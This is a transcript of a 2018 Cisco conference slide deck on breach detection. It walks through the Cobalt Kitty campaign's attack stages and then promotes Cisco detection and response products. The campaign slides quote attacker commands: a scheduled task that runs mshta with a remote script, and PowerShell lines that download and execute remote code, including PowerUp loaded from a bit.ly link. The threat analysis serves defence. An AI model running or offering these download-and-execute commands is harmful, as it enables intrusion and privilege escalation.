breach detection and mitigation - cisco · 19 - 21 march 2018 | cisco connect | rovinj, croatia...
TRANSCRIPT
Breach Detection and Mitigation Practical ExamplesDragan Novakovic
Consulting Systems Engineer
3
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia
Challenges Today
Many discrete security productsInformation overload High cost of attacker attributionInefficient breach mitigation process
4
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia
Advanced Adversary
5
• A step below government-sponsored attackers but much more wide spread
• Individuals or organized groups, not governments
• Going after a smaller amount of targets but higher profits per target • Capable of steering
infections individually
• Going after $$ - intellectual property, access and user data
• Sandboxing & Analysis evasion• Misuse of legitimate resources• Low forensic footprint• Layers of scripting• Steganography• Stable C&C
Advanced Attack Commonalities
6
YOU
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 7
From The Trenches: Cobalt Kitty Campaign
§ Well documented campaign
§ Revealing latest attack techniques & tactics
§ Resulted in compromise of domain admin account and sever data breach
Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle
Delivery Exploitation Installation Persistence Lateral Movement Exfiltration
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 8
From The Trenches: Cobalt Kitty Campaign
Spear-phishing – email containing links to fake Flash update– Users likely to grant admin rights– Downloads and executes Cobalt Strike Beacon (post exploitation tool)
Microsoft Office Word document with macros– Macro creates simple scheduled tasks using cmd.exe– Windows App Locker script blocking policy bypass using regsvr32.exe
(Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server)– Run PowerShell with rundll32 to bypass software restrictions
(https://github.com/p3nt4/PowerShdll)
Delivery
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 9
schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr
"mshta.exe about:'<script language=\"vbscript\" src=\“http:xxx/microsoftp.jpg\">code close</script>'"/mo 15 /F
From The Trenches: Cobalt Kitty Campaign
Set objShell = CreateObject(“Wscript.Shell”)intReturn = objShell.Run(“powershell –execute bypass -com”” IEX ((new-object net.webclient).downloadstring (‘hxxp://xx/image.jpg')))
Scheduled Task Creation
Microsoft HTML Application VB Script script execution
Run CMD command in VB
Cobalt Strike Beacon
PowerShell script exec.
Exploitation
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 10
From The Trenches: Cobalt Kitty CampaignPersistence Mechanisms
– Windows Scheduled Tasks– Windows Services– Windows Registry Autorun keys
DLL Hijacking– Using legitimate software to execute a
trojanized DLL– Abuses DLL not being there by default OR
search order in which it is loaded
Persistence
Windows Search loading msfte.dll
Google Update loading goopdate.dll
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 11
From The Trenches: Cobalt Kitty CampaignFile-less Credentials and Hashed stealing
– Modified version Of Mimikatz (file-less)– Modified version of password file dumper
Lateral Movement– Pass-the-hash and pass-the-ticket attacks– Use of Windows Management Instrumentation
(WMI) for remote execution
Lat. Movement
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 12
From The Trenches: Cobalt Kitty CampaignFile-less Scanning Using PowerUp
– Scanning for open ports, vulnerable services and OS fingerprinting using externally hosted Powershell script loaded into memory:
Lat. Movement
Powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks
https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
Powershell Invoke Expression
PowerUp methodFile-less download
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 13
From The Trenches: Cobalt Kitty Campaign
C&C and Exfiltration using NetCat, DNS Tunelling & Cobalt Strike Malleable C2
Outlook scripts to send exfiltrated data to Gmail address
Exfiltration
Sends exfiltrated data via email
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 14
Sun Tzu, The Art of War
htt
p:/
/ma
xp
ixe
l.fr
ee
gre
atp
ictu
re.c
om
/Mu
se
um
-Sta
tue
-Xia
n-O
ld-C
hin
a-W
arr
iors
-14
45
58
7“The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him”
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 15
1. Hinder In-Advance Attack Preparation
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 16
1. Hinder In-Advance Attack PreparationüCognitive Treat
Analytics– Internal state– Passive– No feeds
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 17
1. Hinder In-Advance Attack PreparationüStealthWatch
– Passive– Lat. Movement– Baselining
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 18
2. Deploy Generic C&C Detectors
ü Umbrella Investigate– Predictive algorithms – Automatic takedown– Co-occurrences
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 19
2. Deploy Generic C&C Detectorsü Cognitive Threat
Analytics– Uncover entire
infrastructure – Behavior and context– Including low & slow
and steganography-based channels
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 20
2. Deploy Generic C&C Detectorsü Encrypted Traffic
Analytics (Stealthwatch)Detects malicious traffic by analyzing: – Initial data packet– hostname– certificate information– supported cipher suites – packet size/timing in TLS-based connections
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 21
Because:
Do:§ Collect and have at hand endpoint and network activity logs
3. Stream Endpoint and Network Level Traces
Coding errors happen
Mistakes happen
Detection due to definition update happen
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 22
3. Stream Endpoint and Network Level Tracesü AMP for Endpoints
– Collects traces– Retrospection– Root cause analysis– Exploit Prevention– Heuristic Detection
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 23
3. Stream Endpoint and Network Level Tracesü StealthWatch
– NetFlow for security
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 24
3. Stream Endpoint and Network Level Tracesü Threat Grid
– Global database – Indicators of compromise – Pivoting and context
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia
250+Full Time Threat Intel Researchers
MILLIONSOf Telemetry Agents
1100+Threat Traps
100+Threat Intelligence Partners
THREAT INTEL
1.5 MILLIONDaily Malware Samples
600 BILLIONDaily Email Messages
16 BILLIONDaily Web Requests
Honeypots
Open Source Communities
Vulnerability Discovery (Internal)
Product Telemetry
Internet-Wide Scanning
20 BILLIONThreats Blocked
INTEL SHARING
Customer Data Sharing Programs
Service Provider Coordination Program
Open Source Intel Sharing
3rd Party Programs (MAPP)
Industry Sharing Partnerships (ISACs)
500+Participants
25
4. Use Vendor with Large Threat Research Teamü TALOS
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 26
4. Use Vendor with Large Threat Research Teamü TALOS
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 27
4. Use Vendor with Large Threat Research Team
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 28
5. Deploy Full Detector Stack
More detectors
Complex malware
Bugs, Cost & Risk Increase
FW/NGFW
NGIPS
Antivirus
Reputation/Rules
Policy/Patches
Content Filtering
Sandboxing
Anomaly
Machine Learning
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 29
Everything is Configured…Now what?
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 30
Breach Detection and Mitigation - Practically!
Breach Detection Immediate Reaction Final ReactionB
reac
h D
etec
tion Detecting a
breachEstablishing priority rating
Imm
edia
te R
eact
ion Following traces
from C&C to a fileEstimating spread on the endpoint and in the networkReviewing related network activity
Fina
l Rea
ctio
n Finding additional malicious activity on the endpointAnalyzing the root causeReimaging the affected endpointsUpdating policies to prevent reinfection
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 31
Breach Detection and Mitigation Process
• CTA detects C2 channel (or Umbrella or Investigate or IoC or Talos)
• TG provides global and local file behavior context (endpoint level details)
• AMP identifies files responsible for C&C activity and provides endpoint visibility
• AMP quarantines malicious executables and blocks their further reintroduction
• ISE quarantines the endpoint
• AMP is used for root cause analysis before endpoint is re-imaged
All steps need to be done within hours to prevent data leaks!
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 32
Notification About a BreachDaily reports in CTA
Weekly reports in AMP
Too Slow!
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 33
Notification About a Breach - Better!§ Subscribe to email alerts
§ Use SIEM for a more granular control
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 34
Establishing Priority RatingAMP and Threat Grid Threat prioritization
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 35
Establishing Priority RatingCTA Threat prioritization
Low RiskNetwork onlyTry cleanIf failed, monitor
Medium RiskLight infectionTry cleanIf failed, reimage
High RiskBad infectionReimage
Critical RiskData damageQuarantineReimage
Establishing Priority RatingDemo: AMP Event Correlation
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public
Step 1:Breach Detection
37
Demo: Breach Detection
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public
Step 2:Immediate Reaction
39
Demo: Immediate Reaction
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 41
Automatic response with ISE
CTAIncident
ISE
Device
HTTP(S)
Logs
STIX/TAXII
Quarantine
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia
AMP Cloud
NGIPS NGFW
Network AppliancesEndpoints Content Appliances
WWW
WSA ESA
Device Trajectory
Whitelists Blacklists
Customer Specific
42
Block Everywhere - AMP Unity
© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public
Step 3:Final Reaction
43
Demo: Final Reaction
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 45
Complex Malware Revealed
Powershellprivilege
escalation
Browser extension installation
Stealing browser
credentials
Malware injection
path
Would be prevented by ISE quarantine
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia 46
Browser Exfiltration Module Revealed
C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js
19 - 21 March 2018 |����Cisco Connect | Rovinj, Croatia
• AMP for Endpoints• Cognitive Threat Analytics • Threat Grid• StealthWatch• AMP Visibility• ISE
47
Technologies Used